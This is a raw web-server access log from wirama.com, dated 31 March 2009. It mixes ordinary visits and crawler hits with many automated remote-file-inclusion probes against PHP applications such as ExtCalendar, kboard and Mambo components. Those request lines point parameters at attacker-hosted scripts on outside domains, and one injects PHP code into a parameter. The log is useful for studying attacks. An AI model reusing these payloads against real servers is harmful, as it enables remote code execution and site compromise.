219.85.63.226 - - [31/Mar/2009:02:36:25 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:02:36:25 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:02:41:49 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:02:41:49 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:02:47:41 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:02:47:41 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:02:57:25 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:02:57:25 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:02:34 -0700] "GET /bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:02:36 -0700] "GET /logs/bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:10:58 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:10:59 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:17:41 -0700] "GET /bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:17:41 -0700] "GET /logs/bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:21:04 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:21:04 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:28:39 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:28:40 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:34:41 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:34:41 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
208.80.195.31 - - [31/Mar/2009:03:38:55 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5; yplus 5.1.04b); .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.6)" "wirama.com"
219.85.63.226 - - [31/Mar/2009:03:45:37 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:45:37 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
74.6.22.101 - - [31/Mar/2009:03:49:35 -0700] "GET /_private/ HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.98.100.202 - - [31/Mar/2009:03:54:28 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
65.98.100.202 - - [31/Mar/2009:03:54:28 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
65.98.100.202 - - [31/Mar/2009:03:54:28 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
65.98.100.202 - - [31/Mar/2009:03:54:49 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
65.98.100.202 - - [31/Mar/2009:03:54:49 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
65.98.100.202 - - [31/Mar/2009:03:54:50 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:56:02 -0700] "GET /logs/bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:56:02 -0700] "GET /bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
119.27.62.254 - - [31/Mar/2009:03:57:13 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0" "wirama.com"
203.126.136.142 - - [31/Mar/2009:03:57:13 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
203.126.136.142 - - [31/Mar/2009:03:57:15 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
203.126.136.142 - - [31/Mar/2009:03:57:18 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
203.126.136.142 - - [31/Mar/2009:03:57:28 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com.sg/search?hl=en&q=wirama&btnG=Google+Search&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:58:11 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:03:58:11 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:03:58:28 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com.sg/search?hl=en&q=wirama&btnG=Google+Search&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:03:58:44 -0700] "GET / HTTP/1.1" 200 916 "http://venturebeat.com/2007/02/28/wirama-wireless-rfid-co-raises-first-round-of-funding/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:03:58:45 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
203.126.136.142 - - [31/Mar/2009:03:58:47 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
119.27.62.254 - - [31/Mar/2009:03:58:48 -0700] "GET /_private HTTP/1.1" 301 94 "-" "Mozilla/4.0" "www.wirama.com"
119.27.62.254 - - [31/Mar/2009:03:58:48 -0700] "GET /_private/ HTTP/1.1" 200 675 "-" "Mozilla/4.0" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:03:58:49 -0700] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:04:00:57 -0700] "GET /bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:04:00:57 -0700] "GET /logs/bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:04:02:15 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com.sg/search?hl=en&q=wirama&btnG=Google+Search&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:04:03:29 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:04:03:29 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
65.98.100.202 - - [31/Mar/2009:04:04:49 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
65.98.100.202 - - [31/Mar/2009:04:04:49 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
65.98.100.202 - - [31/Mar/2009:04:05:04 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
65.98.100.202 - - [31/Mar/2009:04:05:04 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
219.85.63.226 - - [31/Mar/2009:04:07:56 -0700] "GET /bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:04:07:57 -0700] "GET /logs/bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:04:09:00 -0700] "GET / HTTP/1.1" 200 916 "http://www.rfidsolutionsonline.com/article.mvc/Passive-RFID-Reader-Wirama-Demonstrates-World-0001?VNETCOOKIE=NO" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
119.27.62.254 - - [31/Mar/2009:04:09:03 -0700] "GET /logs HTTP/1.1" 301 90 "-" "Mozilla/4.0" "www.wirama.com"
119.27.62.254 - - [31/Mar/2009:04:09:04 -0700] "GET /logs/ HTTP/1.1" 200 1659 "-" "Mozilla/4.0" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:04:09:04 -0700] "GET /logs/ HTTP/1.1" 200 1659 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
119.27.62.254 - - [31/Mar/2009:04:09:08 -0700] "GET /logs/access.log HTTP/1.1" 200 38206 "-" "Mozilla/4.0" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:04:09:10 -0700] "GET /logs/access.log HTTP/1.1" 200 38330 "http://www.wirama.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:04:13:46 -0700] "GET /bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:04:13:47 -0700] "GET /logs/bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
119.27.62.254 - - [31/Mar/2009:04:14:42 -0700] "GET /pr0 HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.wirama.com"
203.126.136.142 - - [31/Mar/2009:04:14:42 -0700] "GET /pr0 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "www.wirama.com"
65.55.208.47 - - [31/Mar/2009:04:24:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [31/Mar/2009:04:24:30 -0700] "GET /logs/?N=A HTTP/1.1" 200 1659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.61 - - [31/Mar/2009:04:36:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.61 - - [31/Mar/2009:04:36:08 -0700] "GET /logs/?S=D HTTP/1.1" 200 1659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.105.96.41 - - [31/Mar/2009:04:50:11 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.105.96.41 - - [31/Mar/2009:04:50:11 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.105.96.41 - - [31/Mar/2009:04:50:11 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.105.96.41 - - [31/Mar/2009:04:51:04 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [31/Mar/2009:05:24:27 -0700] "GET /logs/access_090301.log//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [31/Mar/2009:05:24:27 -0700] "GET /logs//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [31/Mar/2009:05:24:27 -0700] "GET /oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
24.211.245.92 - - [31/Mar/2009:05:34:17 -0700] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.com/search?rlz=1C1GGLS_en-USUS291US305&sourceid=chrome&ie=UTF-8&q=robots.txt+charlotte+exabot" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19" "www.wirama.com"
24.211.245.92 - - [31/Mar/2009:05:34:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19" "wirama.com"
208.116.53.212 - - [31/Mar/2009:05:36:38 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
208.116.53.212 - - [31/Mar/2009:05:36:38 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
65.55.208.48 - - [31/Mar/2009:05:58:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.48 - - [31/Mar/2009:05:58:28 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.58 - - [31/Mar/2009:06:07:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.58 - - [31/Mar/2009:06:07:59 -0700] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
207.182.137.218 - - [31/Mar/2009:06:08:20 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.wirama.com"
207.182.137.218 - - [31/Mar/2009:06:08:20 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.wirama.com"
74.6.22.101 - - [31/Mar/2009:06:26:22 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
213.203.223.93 - - [31/Mar/2009:06:27:30 -0700] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.203.223.93 - - [31/Mar/2009:06:27:30 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.203.223.93 - - [31/Mar/2009:06:27:30 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.100 - - [31/Mar/2009:06:32:05 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.100 - - [31/Mar/2009:06:32:05 -0700] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.100 - - [31/Mar/2009:06:32:05 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
116.122.158.77 - - [31/Mar/2009:06:32:30 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
116.122.158.77 - - [31/Mar/2009:06:32:30 -0700] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
116.122.158.77 - - [31/Mar/2009:06:32:30 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
206.55.119.150 - - [31/Mar/2009:06:45:11 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
206.55.119.150 - - [31/Mar/2009:06:45:11 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
74.6.22.101 - - [31/Mar/2009:06:47:14 -0700] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "wirama.com"
207.182.137.218 - - [31/Mar/2009:07:31:01 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
207.182.137.218 - - [31/Mar/2009:07:31:01 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.wirama.com"
72.51.35.32 - - [31/Mar/2009:07:32:22 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.wirama.com"
72.51.35.32 - - [31/Mar/2009:07:32:22 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.wirama.com"
38.99.13.121 - - [31/Mar/2009:07:44:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "wirama.com"
72.51.35.32 - - [31/Mar/2009:07:45:43 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://release4future.com/images/smilies/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.wirama.com"
